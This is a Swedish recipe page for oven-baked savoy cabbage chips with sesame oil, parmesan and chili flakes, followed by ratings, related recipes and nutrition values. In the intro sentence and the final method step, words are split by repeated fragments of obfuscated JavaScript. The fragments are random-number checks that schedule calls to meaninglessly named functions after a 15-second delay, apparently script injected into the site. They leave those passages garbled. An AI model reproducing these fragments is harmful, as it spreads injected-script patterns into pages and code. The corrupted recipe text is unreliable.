Savoy chips med sesamolja parmesan och chili

2013-07-09
IMG_3692IMG_3693
  • Servings : 2
  • Prep Time : 5m
  • Cook Time : 25m
  • Ready In : 30m

En mättandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e och spännade variant på hälsosamma chips

Ingredienser

  • 1 huvud savoykål
  • 15 g (ca 4 msk) sesamolja
  • ca 2-3 nypor chiliflingor
  • 2 nypor havssalt
  • 20 g (ca 1 dl) parmesan riven 30%
    • Gör så här:

    • Sätt ugnen på 140 grader. Dra av bladen från savoykålen (ca 10 blad) och ta sedan en kniv och skär bort den tjocka stammen i mitten på savoybladet.

      Dela bladen i två delar och lägg upp dem på en plåt, lämna lite utrymme mellan varje blad. Pensla bladen med sesamolja och strö över parmesan, lite havssalt och chiliflingor.

      Ställ in plåten i ugnen i ca 25-30 min och se till att ha ett extra öga på bladen. Det kan vara lite ojämnt tid på när bladen blir färdiga, ta då bara ut dem klara savoychipsen och låt dem andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ra stå inne tills dem blir klara. När bladen är klara så ska dem vara lagom krispiga.

      Recipe Type: , , Ingredienser: ,
Medlemsbetyg

(5 / 5)

5 5 2
Betygsätt recept

2 people rated this recipe

Related Recipes:
  • _SAM0905

    Sallad på svartvitlöks rostad pumpa, lök, paprika, tomat med chevreost, spenat och svartkålschips.

  • _SAM0920

    Svartvitlöks rostad kyckling

  • _SAM0671

    Sremska korv med rostad gulbeta, potatis, sparris, spenat, svartvitlök med fetaostkräm

  • Vitchoklad & hallonpudding

    Vitchoklad & hallonpudding

  • SAM_0426

    Lax stekt i svartvitlök, rotfrukts, spenatsallad med kapris och persiljekräm.

Näringssinnehåll

Informationen gäller per portion

  • kcal

    152
  • protein

    4.5
  • fett

    9.5
  • kolhydrater

    3

Recipe Comments

Post A Comment

Current ye@r *